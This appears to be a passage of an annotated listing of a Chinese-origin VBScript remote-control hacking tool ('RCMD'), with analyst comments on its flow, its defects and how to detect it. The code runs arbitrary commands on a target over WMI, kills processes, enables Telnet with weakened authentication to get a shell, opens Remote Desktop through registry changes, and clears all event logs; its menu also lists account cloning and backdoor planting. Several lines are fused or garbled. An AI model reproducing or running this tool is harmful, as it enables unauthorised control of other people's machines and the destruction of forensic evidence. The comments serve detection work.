SizeFormat = Round (Size, 1) & "MB"

END IF

END IF

END FUNCTION

' Returns the last instance of the named WMI class (the loop keeps overwriting obj). With no
' instances "obj" is never set and the final Set raises (masked by Resume Next).
Function Objget (MSG)

Set col = objswbemservices.instancesof (msg)

For Each Objx in col

Set obj = Objx

NEXT

Set objget = OBJ

END FUNCTION

'************************************************

' Prompts for the next remote command and hands off to Run(). Run() calls back into this function,
' so the pair recurses rather than looping; the only way out is main() followed by WScript.quit.
Function command ()

Wscript.echo "Plese Enter the Command:"

Call Run ()

END FUNCTION

' Executes an arbitrary command line on the target through Win32_Process.Create (ExecMethod form)
' and reports the new PID. "exit"/"quit"/"0" re-enter main(), which never returns. On the error
' path "Call command ()" likewise never returns, so the PID and success lines are reached only when
' ReturnValue was 0. The first statement and the Set are fused on one printed line.
' Target-side detection: processes whose parent is WmiPrvSE.exe.
Function Run ()

Strcmdline = wscript.stdin.readline ()

if strcmdline = "exit" or strcmdline = "quit" or strcmdline = "0" THEN

Call main ()

END IF

OutStreem.write "Running The Command ...." set objinstance = objswbemservices.get ("win32_process")

Set objmethod = Objinstance.Methods _ ("create")

Set objinparam = objmethod.inparameters.spawninstance_ ()

Objinparam.commandline = STRCMDLINE

Set objoutparam = Objinstance.execmethod _ ("create", objinparam)

IF Objoutparam.ReturnValue <> 0 THEN

WScript.echo "Error!"

Call command ()

Else

WScript.echo "OK!"

END IF

Wscript.echo "The process id is" & objoutparam.processid

Wscript.echo "Runing Command:" & strcmdline & ". to" & ipaddress & "surcessful" & vbcrlf

Call command ()

END FUNCTION

'*************************************************

' Lists running processes on the target (name, handle/PID, executable path). "Vbcrf" in the final
' message is an undeclared name (Empty), not vbCrLf — extraction damage.
Function PSList ()

OutStreem.write "Listing Process ...."

Set colinstances = objswbemservices.execQuery ("SELECT * from Win32_Process")

Showerror (Err.Number)

WScript.echo Vbcrlf & "Name" & Chr (9) & chr (9) & "PID" & chr (9) & "ExecutablePath"

For Each Objinstance in Colinstances

' Extra tab for short names so the columns line up.
IF len (objinstance.name) <8 THEN

Strname = objinstance.name & chr (9)

Else

Strname = Objinstance.name

END IF

Wscript.echo strname & chr (9) & objinstance.handle & chr (9) & objinstance.executablePath

NEXT

WScript.echo Vbcrf & "All Process Have Been Listed SuccessFully!"

Call main ()

END FUNCTION

'************************************************

' Terminates a process on the target by PID via Win32_Process.Terminate (reason 0). The PID read from
' stdin is stored in "Striprocess" but every later use reads "strprocess" (undeclared, Empty), so as
' printed the messages and the object path carry no PID. The Get line is fused with what was
' originally a VarType check for "object not found" — extraction damage.
Function pskill ()

Wscript.echo "Plese Enter The Process's ID:"

Striprocess = wscript.stdin.readline ()

OutStreem.write "killing id =" & strprocess & "process ...."

Set objinstance = objswbemservices.get ("win32_process.handle =") ing varInstance <> vbobject then

WScript.echo Vbcrf & "Specified Process is not exist."

Call main ()

Else

Set objmethod = Objinstance.Methods _ ("terminate")

Set objinparam = objmethod.inparameters.spawninstance_ ()

Objinparam.reason = 0

Set objoutparam = Objinstance.execmethod_ ("Terminate", Objinparam)

' Passes the method's ReturnValue, unlike most callers which pass Err.Number.
ShowError (Objoutparam.ReturnValue)

Wscript.echo "The process's id =" & strprocess & "have been killed successful"

END IF

Call main ()

END FUNCTION

'********************************************************** *******

' Toggles the target's Telnet Server (service TlntSvr): if it is running, stops it; otherwise prompts
' for an NTLM mode (0..2) and a port, writes both with StdRegProv.SetDWORDValue under the Telnet
' Server key (path garbled in the listing), starts the service and prints a ready-to-use telnet
' command. Validation: ntlm must be numeric 0..2; port only numeric (no range check, unlike RS()).
' "... Stop SuccessFully." ELSE" is one fused line. Defender: the Telnet service starting, or its NTLM
' value being lowered (weaker authentication), are reliable indicators; telnet should not be enabled
' on modern hosts at all.
Function Telnet ()

OutStreem.write "Querying State of Telnet Server ...."

' Reconnects to root\cimv2 (overwrites the global connection object).
Set objswbemservices = objlocator.connectServer (iPaddress, "Root / Cimv2", UserName, Password)

Set colinstances = objswbemservices.execQuery ("SELECT * WIN32_SERVICE WHERE NAME = 'TLNTSVR')

Showerror (Err.Number)

For Each Objinstance in Colinstances

' A disabled service is first switched to manual so it can be started.
If Objinstance.StartMode = "disabled" then

OutStreem.write "Telnet Server Has Been Disabled. Now change start mode to manual ...."

Set objmethod = objinstance.methods _ ("changestartMode")

Set objinparam = objmethod.inparameters.spawninstance_ ()

Objinparam.StartMode = "manual"

Set objoutparam = Objinstance.execmethod _ ("ChangeStartMode", Objinparam)

ShowError (Objoutparam.ReturnValue)

END IF

OutStreem.write "changeing state ...."

IF objinstance.started = True Then

IntStatus = Objinstance.stopservice ()

ShowError (intstatus)

Wscript.echo "Target Telnet Server Has Been Stop SuccessFully." ELSE

' In this branch IntStatus has not been assigned yet (Empty), so this reports "OK!" unconditionally.
ShowError (intstatus)

Wscript.echo "Plese Enter the NTLM:"

NTLM = wscript.stdin.readline ()

Wscript.echo "Plese Enter the port:"

Port = wscript.stdin.readline ()

IF not isnumeric (ntlm) or ntlm <0 or ntlm> 2 THEN

Wscript.echo "The Value of NTML IS WRONG."

Call main ()

END IF

IF not isnumeric (port) THEN

Wscript.echo "The value of port is wrong."

Main ()

END IF

' Separate root\default connection for StdRegProv; hDefKey &H80000002 = HKEY_LOCAL_MACHINE.
Set objswbemservices1 = objlocator.connectServer (iPaddress, "root / default", username, password)

OutStreem.write "setting ntlm =" & ntlm & "...."

Set objinstance1 = objswbemservices1.get ("stdregprov")

Set objmethod = objinstance1.methods _ ("setdwordValue")

Set objinparam = objmethod.inparameters.spawninstance_ ()

Objinparam.hdefkey = & h80000002

Objinparam.ssubkeyName = "Software / Microsoft / Telnet Server.0"

Objinparam.svaluename = "ntlm"

Objinparam.uValue = NTLM

Set objoutparam = objinstance1.execmethod _ ("setdwordValue", objinparam)

ShowError (Objoutparam.ReturnValue)

OutStreem.write "setting port =" & port & "...."

' Reuses the same in-parameter object; only value name and data change.
Objinparam.svaluename = "telnetport"

Objinparam.UValue = port

Set objoutparam = objinstance1.execmethod _ ("setdwordValue", objinparam)

ShowError (Objoutparam.ReturnValue)

' StartService's return code is stored but not checked before the success message.
IntStatus = Objinstance.StartService ()

WScript.echo "Target Telnet Server Has Been Start SuccessFully!"

WScript.echo "Now, You CAN TRY: Telnet" & Ipaddress & "& Port &" To Get A Shell. "

END IF

NEXT

Call main ()

END FUNCTION

'********************************************************** ******* Function RS ()

' Enables Remote Desktop on the target. Note the "Function RS ()" header above is fused onto the
' comment line, so as printed the body sits at top level and main()'s "RS ()" call has no target.
' Flow: refuses OS captions without "Server", reads a port (1..65000), then via StdRegProv sets
' TSEnabled=1, TermDD and TermService Start=2 (automatic), the RDP-Tcp PortNumber, plus NetCache and
' Installer policy values, and offers a forced reboot (required for the change to take effect).
' Defects visible in the listing: the first ".createKey," lacks the HKLM argument; SetStringValue and
' the PortNumber SetDWordValue are fused on one line; the OS check prints "OK!" on both branches.
' Defender: Terminal Server / TermService registry changes made by a script host, and an RDP port
' other than 3389, are the indicators.
Outstreem.write "Checking the OS Type ...."

Set colinstoscaption = objswbemservices.execQuery ("Select Caption from Win32_Operatingsystem")

For Each Objinstoscaption in Colinstoscaption

IF INSTR (Objinstoscaption.caption, "Server")> 0 THEN

WScript.echo "OK!"

Else

WScript.echo "OK!"

WScript.echo "OS Type IS" & Objinstoscaption.caption

Wscript.echo "You Cann't Open Terminal Services, Canceling ...." & chr (13) '60

Call main ()

END IF

NEXT

Wscript.echo "Plese Enter the port:"

Port = wscript.stdin.readline ()

IF not isnumeric (port) or port <1 or port> 65000 Then '50

Wscript.echo "The Number of Port is Error."

Call main ()

END IF

OutStreem.write "Writing Into Registry ...."

' root\default connection for StdRegProv; HKLM = &H80000002.
Set objinstreg = objlocator.connectServer (iPaddress, "root / default", username, password) .get ("stdregprov")

HKLM = & h80000002

With objinstreg

.createKey, "Software / Microsoft / Windows / CurrentVersion / Netcache"

.SetdWordValue HKLM, "Software / Microsoft / Windows / Currentversion / Netcache", "Enabled", 0 '770

.createKey HKLM, "Software / Policies / Microsoft / Windows / Installer"

.SetdWordValue HKLM, "Software / Policies / Microsoft / Windows / Installer", "EnableadmintsRemote", 1

.SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server", "Tsenabled", 1

' Start = 2 is SERVICE_AUTO_START for the RDP driver and service.
.SetdWordValue HKLM, "System / CurrentControlset / Services / Termdd", "START", 2

.SetdWordValue HKLM, "System / CurrentControlset / Services / Termservice", "START", 2

.SetstringValue HKLM, ". Default / Keyboard Layout / Toggle", "Hotkey", "1" .SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server / WinStations / RDP-TCP", "Portnumber", Port

End with

Showerror (Err.Number)

Wscript.echo "Now, you need to reboot target!"

WScript.echo "Do you want to reboot target now? [y / n]"

Strcancel = wscript.stdin.readline ()

' Anything other than "n" reboots; reboot() re-enters main(), so the line after END IF is only
' reached when the user answers "n" — and main() never returns either.
if strcancel = "n" then

Wscript.echo "you need to reboot target kiln !!"

Call main ()

Else

Call reboot ()

END IF

Wscript.echo "You Can Logon Terminal Services On" & Port & "Later, Good Luck!"

Call main ()

END FUNCTION

'********************************************************** ************

' Clears every event log on the target via Win32_NTEventLogFile.ClearEventLog (anti-forensics);
' the query flag &H20 is wbemFlagForwardOnly. Clearing is itself recorded as the first entry of the
' new log — Security 1102 and System 104 — so those events, and unexplained gaps in log history, are
' the detection. The WQL lacks "FROM" as printed and the closing quote of the success message is doubled.
Function clog ()

OutStreem.write "clearing all logs ...."

StrwqlQuery = "SELECT * WIN32_NTEVENTLOGFILE"

Set colinstances = objswbemservices.execQuery (StrwqlQuery, "WQL", & H20)

For Each Objinstance in Colinstances

' A non-zero return aborts to the menu after the first failing log; earlier logs stay cleared.
IF objinstance.cleareventlog () <> 0 THEN

WScript.echo "Error!" '100

Call main ()

END IF

NEXT

WScript.echo "OK!"

WScript.echo "All logs have been clear successful" "

Call main ()

END FUNCTION

'********************************************************** *************

' Error reporter: on error prints "Error 0X<hex>" plus the description and jumps back to the main
' menu (never returning to the caller); on success prints "OK!". Same extraction damage as
' showerroronly: the condition ("dam", originally "<> 0 THEN") and a closing parenthesis are lost.
' It reports Err.Number rather than the ERRORNUMBER it was given, so callers that pass a method
' ReturnValue (pskill, Telnet) get the wrong code echoed.
Function showerror (ERRORNUMBER)

IF errornumber dam

Wscript.echo "Error 0X" & CSTR (HEX (Err.Number) & "."

IF Err.Description <> "" "" "

WScript.echo "Error Description:" & Err.Description & "."

END IF

Call main ()

Else

WScript.echo "OK!"

END IF

END FUNCTION

'********************************************************** *****************

' Prints the banner and usage line. The first two echo statements are fused onto one printed line.
' The author/site/contact strings below are stable text in this tool and serve as simple static
' signatures for detecting copies of the script.
Function usage ()

WScript.echo String (79, "*") WScript.echo "RCMD V1.05"

WScript.echo "Remote Execution Script, By Black"

Wscript.echo "Welcome to Visite www.xyhack.91i.net"

WScript.echo "QQ: 123230273 E-mail: cnhacker521@hotmail.com"

Wscript.echo "Usage:"

Wscript.echo "CScript" & wscript.scriptfullname & "targetip username password"

Wscript.echo "Ten Chose the Command>"

WScript.echo String (79, "*")

END FUNCTION

'********************************************************** **********

' Interactive menu dispatcher. Each handler re-enters main() as its last action, so this never
' returns to a caller; the only clean exit is WScript.quit on "quit"/"0". Unknown input falls out
' of the Select and the function ends, which unwinds through every pending "Call main ()" back to
' the top level and the script terminates. "Case "SLIST", "9" List Listsvr ()" is a fused line (the
' "List" token is stray); the "B","B" and "C","C" labels are duplicated — presumably lower/upper-case
' pairs flattened by extraction, as the surviving "A","a" pair suggests.
Function main ()

WScript.echo ""

Wscript.echo "now chose the commit>"

WScript.echo "0.quit exits script"

Wscript.echo "1.telnet remote / off Telnet"

WScript.echo "2.3389 remote open 3389"

Wscript.echo "3.clog Remote Delete All Logs"

WScript.echo "4.Getf Gets the broiler system information"

WScript.echo "5.pslist Example Process"

WScript.echo "6.pskill Delete Process"

Wscript.echo "7.commad remote execution dos command"

Wscript.echo "8.reboot Remote Restart broiler"

Wscript.echo "9.slist Examples from the service information on remote broiler"

Wscript.echo "a.share 1. List sharing 2. Create a shared 3. Delete Sharing"

WScript.echo "B.ca Clone Account"

Wscript.echo "C. Door planting the door"

WScript.echo String (79, "*")

WScript.echo "CMD>"

CMD = wscript.stdin.readline ()

WScript.echo ""

' String matches are case-sensitive ("telnet" but not "Telnet", etc.).
SELECT CASE CMD

Case "telnet", "1"

Telnet ()

Case "3389", "2"

RS ()

Case "clog", "3"

CLOG ()

Case "getf", "4"

INF ()

Case "PSL", "PSLIST", "5"

PSList ()

Case "PSK", "Pskill", "6"

pskill ()

Case "CMD", "Command", "7"

Command ()

Case "Reboot", "8"

Reboot ()

Case "SLIST", "9" List Listsvr ()

Case "Share", "10", "A", "a"

Share ()

Case "B", "B", "11"

CA ()

Case "C", "C", "12"

Door ()

Case "quit", "0"

WScript.quit

End SELECT

END FUNCTION

